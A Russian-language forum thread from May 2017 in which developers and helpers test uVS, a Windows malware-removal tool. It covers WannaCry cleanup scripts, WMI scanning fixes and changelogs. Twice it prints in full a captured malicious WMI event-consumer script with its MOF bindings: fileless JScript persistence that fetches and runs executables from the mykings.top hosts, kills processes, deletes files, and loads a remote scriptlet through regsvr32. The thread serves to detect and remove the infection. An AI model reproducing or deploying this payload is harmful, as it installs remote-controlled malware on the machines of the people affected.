uVS - Тестирование

[santy 153]

25 минут назад, demkd сказал:

нашел кого цитировать xD

ну, или так:

Цитата

Сегодня (примечание: без объявления войны), 12 мая 2017 года, компании и организации из самых разных стран мира (включая Россию) начали массово сообщать об атаках шифровальщика Wana Decrypt0r, который также известен под названиями WCry, WannaCry, WannaCrypt0r и WannaCrypt.

Впервые вымогатель WCry был обнаружен еще в феврале 2017 года, но тогда он не произвел большого впечатления на специалистов. По сути, до сегодняшнего дня шифровальщик был практически неактивен, но теперь он получил версию 2.0 и использует SMB-эксплоит АНБ из инструментария, опубликованного ранее хакерской группой The Shadow Brokers.

https://xakep.ru/2017/05/12/wcry-ransomware-apocalypse/

[santy 153]

как временная мера:

 

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
bp C:\WINDOWS\MSSECSVC.EXE
bl DB349B97C37D22F5EA1D1841E3C89EB4 3723264
bp C:\PROGRAMDATA\MHLNIUXMEKA934\TASKSCHE.EXE
bl 84C82835A5D21BBCF75A61706D8AB549 3514368
bp C:\USERS\PUBLIC\DESKTOP\@WANADECRYPTOR@.EXE
bl 7BF2B57F2A205768755C07F238FB32CC 245760
restart

перезагрузка, пишем о старых и новых проблемах.
------------

[demkd 636]

2 часа назад, santy сказал:

https://xakep.ru/2017/05/12/wcry-ransomware-apocalypse/

вот это мне кажется больше похоже на правду
"Сбербанк, МВД и МЧС заявили, что хакерам не удалось проникнуть через их системы защиты.«Все попытки вирусных атак на компьютеры были блокированы, заражению не подвергся ни один компьютер. Все интернет-ресурсы МЧС России работают в штатном режиме», — приводит ТАСС слова представителя ведомства."
Тут обычная проблема с дырой в винде, те кто был без надежных фаеров и полегли в очередной раз, ничему не учатся, хотя давно понятно что ходить в инет без железного (в виде роутера) и софтового фаера на машине мягко говоря глупо.
В данном случае и накладно, тем более что адреса для получения выкупа далеко не уникальны и надеяться на разблокировку путем откупа не приходится.
Да и обновляться таки нужно (в данном случае MS17-010 нужен как минимум), а не отключать автоматическое обновление или сидеть на устаревших осях.

[demkd 636]

С WMI проблема была в том что не просматривались все неймспейсы, исправил.
Проблема c FireFox и русскими именами пользователей в путях дополнений осталась... эти.... затейливый клоуны используют непонятную 4-х байтовую кодировку символов, когда время будет разберусь, с ходу я так и не понял что это и главное ЗАЧЕМ ЭТО?

---------------------------------------------------------
 4.0.3
---------------------------------------------------------
 o Улучшена функция поиска обработчиков WMI, теперь просматриваются все неймспейсы.

 

[santy 153]

demkd,

хорошо, тема с обработчиком событий в WMI опять всплыла.

и пока что здесь не решена.

https://forum.kasperskyclub.ru/index.php?showtopic=55590

может получиться на ней проверить.

 

 

[demkd 636]

11 минут назад, santy сказал:

может получиться на ней проверить.

эта версия точно должна видеть, обработчик скорее всего сидел в default неймспейсе, autoruns его просматривает, а uVS не просматривал.

[santy 153]

запросил образ от 4.0.3,

но

здесь и версия 4.0.2 видит его,

 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};

                            

 

HOME-9BAC17A5E2_2017-05-13_19-03-52.7z

[demkd 636]

10 минут назад, santy сказал:

здесь и версия 4.0.2 видит его,

Потому что он в "subscription" неймспейсе, возможно копия и в default сидит, поэтому таки лучше использовать 4.0.3
по идее можно и в другие неймспейсы инсталлировать поддержку обработчиков и будет работать в каком-нибудь "microsoft", но до этого вирусописатели похоже еще не додумались, впрочем теперь уже без разницы, uVS будет видеть его и там.

[PR55.RP55 83]

Demkd

А как эта вся картинка целиком выглядит

Как всё работает - механика так сказать ?

[PR55.RP55 83]

+

По поводу SHA1 для WMI

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

[santy 153]

новый образ, спасибо ребятам с фанклуба ЛК.

 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};

 

                           

HOME-9BAC17A5E2_2017-05-13_19-26-30.7z

[PR55.RP55 83]

+

Сейчас открыл: C:\WINDOWS\system32\wbem

там, есть: C:\WINDOWS\system32\wbem\AutoRecover   с файликами

А не может так получиться, что мы запись удалим...

А она возьмёт и AutoRecover...

И я бы всё таки посмотрел: C:\WINDOWS\system32\wbem\Framework

[PR55.RP55 83]

+

Сравнил выше приведённые скрипты.

Версия: 4.0.3 содержит дополнительную запись:

25 минут назад, santy сказал:

Namespace                   \\.\root\subscription

Которой нет в: 4.0.2

[demkd 636]

1 час назад, PR55.RP55 сказал:

Как всё работает - механика так сказать ?

я ссылки давал на msdn там все расписано что и как.
 

1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

14 минут назад, PR55.RP55 сказал:

Которой нет в: 4.0.2

Да, теперь указывается неймспейс,  но в след версиях я думаю я его перенесу в путь до объекта.

[PR55.RP55 83]

18 минут назад, demkd сказал:

1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

Расчёт  общей суммы ( глобального ) SHA1 для : Инфо.

как раз и позволит создать уникальный идентификатор.

[demkd 636]

7 часов назад, PR55.RP55 сказал:

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

1 штук.

[demkd 636]

Что там за кодировку использовали клоуны из мозиллы я так и не нашел, но декодер сделал, будет ли декодировать что-то отличное от кириллицы я не знаю, проверять желания нет.

---------------------------------------------------------
 4.0.4
---------------------------------------------------------
 o Исправлена ошибка в функции анализа расширений Firefox.

 o Добавлена поддержка кириллицы в пути до расширения Firefox.

 

[PR55.RP55 83]

В 11.05.2017 at 11:18 PM, demkd сказал:

В 11.05.2017 at 9:01 PM, PR55.RP55 сказал:

Такие объекты сразу должны попадать в подозрительные.

это да.

В новых версиях я этого не вижу.

Demkd

А вообще есть какой - то блокнот\планировщик, чтобы всё - всё помнить ?  

[PR55.RP55 83]

+

Даже и не знаю...

-------------

Полное имя                  C:\USERS\ADMIN\DOWNLOADS\UVS_LATEST.ZIP
Имя файла                   UVS_LATEST.ZIP
Тек. статус                 [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
Размер                      3387073 байт
Создан                      15.05.2017 в 16:42:45
Изменен                     15.05.2017 в 16:43:00
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Доп. информация             на момент обновления списка
CmdLine                     "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\uvs_latest.zip"
SHA1                        C690C80CFD215299BCAE4E28DAC99467A64B51C6
MD5                         1DDB17583AD3E710A5ECEA5B7AC19285
                            

 

[alamor 69]

14 часов назад, PR55.RP55 сказал:

Даже и не знаю...

Тоже  заметил в последнее время много подобных файлов, которые раньше вроде не выводились.

[santy 153]

demkd,

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Цитата

Анализ автозапуска...
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!

образ здесь:

МАКСИМ-ПК_2017-05-21_16-08-54.7z

[PR55.RP55 83]

Посмотрел образ и мне мысля пришла...

А, что если рассчитывать SHA1 не только для файлов\объектов но и для  cmd и аналогичных записей.

типа:

"C:\Program Files\Common Files\Doctor Web\Scanning Engine\dwantispam.exe" -pipe:ASServer.Dr.Web -path:"C:\Program Files\Common Files\Doctor Web\Scanning Engine\\"

Таким образом можно автоматически определить легальна данная запись, или нет.

К примеру в системе\образе есть некий объект - его SHA1 нет в базе проверенных но для его деятельности:  команда\ы легальны и есть в базе...

т.е. Такой гибкий способ проверки.

 

[PR55.RP55 83]

+

Может быть рассчитывать не именно SHA1 - а некий его аналог = идентификатор.

[demkd 636]

4 часа назад, santy сказал:

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Гляну.

[demkd 636]

---------------------------------------------------------
 4.0.5
---------------------------------------------------------
 o Добавлен вывод ошибок инициализации com-интерфейса.

 o Добавлен фильтр на расширения в функцию анализа параметров запуска.

 o При сканировании списка по F3/F7 статус подозрительного файла получают все исполняемые файлы с нестандартными расширениями.